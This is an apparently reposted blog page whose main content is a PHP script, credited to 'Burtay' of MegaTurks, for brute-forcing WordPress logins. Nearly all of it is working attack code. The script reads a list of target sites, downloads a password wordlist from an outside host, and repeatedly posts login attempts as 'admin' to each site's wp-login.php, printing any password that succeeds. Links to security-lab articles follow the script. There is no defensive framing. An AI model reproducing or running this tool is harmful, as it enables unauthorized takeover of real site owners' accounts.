WordPress brute forcing

简介:
<?php

/*
*	MegaTurks Wordpress Brute-Forcer
*	Coded By Burtay
*	admin@burtay.org (only mail)
*	Burtay.org	-	Megaturks.net
*	Speacial Thanks RMx
*/

class wp
{

		public $site;
		public $password;
		public $wordlist;
		public $siteler;
		public $regex		=	'general.php';
		
		public function wordlist()
		{
			$liste			=	file_get_contents("http://afrikanhosting.com/images/wp.txt");
			$this->wordlist	=	explode("/n",$liste);
			return $this->wordlist;
		}
		
		public function curl($site,$password)
		{
			$curl			=	curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
			curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php");
			curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat");
			curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
			curl_setopt($curl,CURLOPT_POST,1);
			curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1");
			$calis			=	curl_exec($curl);
			return $calis;
		}
		
		public function siteler($liste)
		{
			$site  			=	file_get_contents($liste);
			$this->siteler	=	explode("/n",$site);
			return $this->siteler;
		}
		
		public function burtay($liste)
		{
			$this->siteler($liste);
			foreach($this->siteler as $sites)
			{
				$site	=	trim($sites);
				echo "Denenen Site : " . $site . "/n";
				  
				  foreach($this->wordlist() as $sifre)
					{
						$password	=	trim($sifre);
						echo "Denenen Sifre " . $password . "/n";
							if ( eregi ($this->regex,$this->curl($site,$password)) )
							{
								echo "-------------------------------------/n";
								echo $site . " icin sifre kirildi sifre : " . $password . "/n" ;
								echo "Coded By Burtay/n";
								echo "Special Thanks RMx/n";
								echo "-------------------------------------/n";
								break;
							}
					}
			}
		}
}
echo "
------------------
MegaTurks.Net   ||
Coded By Burtay	||
------------------			
/n/n
";
$class =	new wp();
$class->burtay($argv[1]);
?>
目录
相关文章
|
10天前
|
SQL 数据安全/隐私保护
[dvwa] Brute Force
[dvwa] Brute Force
|
8月前
|
PHP 数据库 数据安全/隐私保护
phpcms服务器搭建之 phpcms的安装
phpcms服务器搭建之 phpcms的安装
|
11月前
|
存储 SQL 网络安全
[网络安全]DVWA之Brute Force攻击姿势及解题详析合集
[网络安全]DVWA之Brute Force攻击姿势及解题详析合集
107 0
[网络安全]DVWA之Brute Force攻击姿势及解题详析合集
|
11月前
|
关系型数据库 MySQL PHP
DVWA的安装及报错解决
DVWA的安装及报错解决
392 0
|
存储 JavaScript 安全
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(中)
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞
196 0
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(中)
|
存储 安全 JavaScript
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(上)
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞
214 0
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(上)
|
JavaScript 安全 前端开发
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(下)
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞
208 0
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(下)
|
Web App开发 测试技术 数据安全/隐私保护